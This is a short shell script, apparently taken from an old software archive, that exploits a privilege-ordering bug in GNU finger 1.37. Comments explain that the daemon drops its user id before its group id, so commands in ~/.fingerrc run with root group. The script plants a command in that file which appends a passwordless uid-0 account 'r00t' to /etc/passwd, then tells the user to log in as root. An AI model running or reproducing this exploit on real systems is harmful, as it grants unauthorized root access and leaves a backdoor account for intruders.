home *** CD-ROM | disk | FTP | other *** search
- #!/bin/sh
- #
- # Systems running GNU in.fingerd(8) 1.37.
- #
- # There is a bug in the `lib/site/userinfo.c'
- # module of GNU finger version 1.37 allowing
- # any user on a system to execute arbitrary
- # commands with gid root from ~/.fingerrc.
- # The problem is that GNU finger *first*
- # changes its userid thus giving away
- # root privileges and *then* tries to change
- # its gid which will not succeed.
- #
- # ..2 second code by gov-boi
-
- cat << _EOF_ >> ~/.fingerrc
- echo "r00t::0:0::/root:/bin/sh" >> /etc/passwd
- _EOF_
- echo "you may now login as r00t - gov-boi"
-